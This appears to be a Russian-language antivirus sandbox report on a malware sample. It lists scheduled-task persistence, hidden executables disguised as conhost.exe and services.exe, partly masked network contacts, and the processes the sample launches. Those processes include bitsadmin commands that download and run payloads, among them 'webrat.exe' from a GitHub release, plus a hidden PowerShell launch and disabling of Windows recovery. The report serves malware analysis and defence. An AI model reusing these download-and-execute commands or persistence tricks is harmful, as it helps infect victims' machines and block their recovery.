Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\conhost
- <SYSTEM32>\tasks\services
Изменения в файловой системе
Создает следующие файлы
- %ProgramFiles(x86)%\adobe\conhost.exe
- %LOCALAPPDATA%\programs\services.exe
- %TEMP%\7z.dll
- %TEMP%\7z.exe
- %TEMP%\axmstsclib.dll
- %TEMP%\ffmpeg.exe
Присваивает атрибут 'скрытый' для следующих файлов
- %ProgramFiles(x86)%\adobe\conhost.exe
- %LOCALAPPDATA%\programs\services.exe
Сетевая активность
Подключается к
- 'ra#.####ubusercontent.com':443
- 'gi##ub.com':443
TCP
Другие
- 'ra#.####ubusercontent.com':443
- 'gi##ub.com':443
UDP
- DNS ASK mo#####.map.fastly.net
- DNS ASK gi##ub.com
- DNS ASK re#########ets.githubusercontent.com
- DNS ASK dn#.google
- DNS ASK ra#.####ubusercontent.com
- 'dn#.google':443
- '18#.#14.96.1':443
- '18#.#14.97.1':443
Другое
Создает и запускает на исполнение
- 'C:\users\public\documents\backup.exe'
- '%LOCALAPPDATA%\programs\services.exe'
Запускает на исполнение
- '<SYSTEM32>\bitsadmin.exe' /transfer "SoftwareUpdate1" http://17#.#36.252.210/sda21sdsdaa.php C:\Users\Public\Pictures\system.cmd (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /transfer "SoftwareUpdate2" https://github.com/worspear1971/youtube-viewbot/releases/download/New_release/webrat.exe C:\Users\Public\Documents\backup.exe (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' (со скрытым окном)
- '<SYSTEM32>\svchost.exe' -k LocalSystemNetworkRestricted -p -s UmRdpService
- '%WINDIR%\syswow64\reagentc.exe' /disable
